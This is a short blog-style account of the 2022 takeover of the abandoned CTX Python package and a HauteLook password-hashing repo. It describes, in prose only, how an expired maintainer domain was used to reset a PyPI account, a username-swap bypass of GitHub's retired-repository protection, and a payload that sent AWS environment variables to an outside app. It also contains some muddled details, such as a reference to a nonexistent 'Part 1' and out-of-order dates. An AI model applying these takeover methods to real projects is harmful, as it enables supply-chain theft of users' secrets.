Tracing the Impact of a Clothing Retailer's Software Supply Chain Breach on Your Production Environment

Open-source projects are at risk when their maintainers abandon them, as demonstrated by the case of the CTX Python library. Between September 2021 and May 2022, Nordstrom-owned clothing brand HauteLook closed their GitHub account and ceased contributing to the open-source community. In September 2021, they removed their popular AliceBundle repo without any explanation. On May 15th, 2022, a third party registered the GitHub username HauteLook again. Open-source developer FigLeif, who developed and maintained the CTX python package, was inactive between July 2020 and May 2022. His email domain expired in August 2021 but was reregistered by the same third party from Part 1 above. The third party cleverly recreated retired repos of CTX and HauteLook's most prominent repo, a password hashing library named PHAss. GitHub has a security control to prevent the creation of repository names that are equivalent to retired repository names, but the new owner of the FigLeif and HauteLook orgs found a bypass for it: change your username to something other than the previous owner of the repository >> create a repository with the name of the retired repository >> change the username back to the previous owner. The security researcher Yunus Aydin, who took over these repositories, blogged about the attack and posted it on his LinkedIn. He modified the packages so that any time they run, the AWS environment variables are sent to an Heroku-hosted app he controlled. This is dangerous because many applications store sensitive secrets in environment variables. Since Yunus managed to take over FigLeif's domain, he managed to reset the password to PyPi and upload a malicious package on May 14th. The security researcher Somdev found additional instances of this by running a GitHub search. All open-source software needs a succession plan for when their maintainers move on. Building a successful, stable, useful library is surprisingly thankless. Both PHAss and CTX hadn't been touched in years and hadn't needed it. Their developers can't be blamed for losing interest.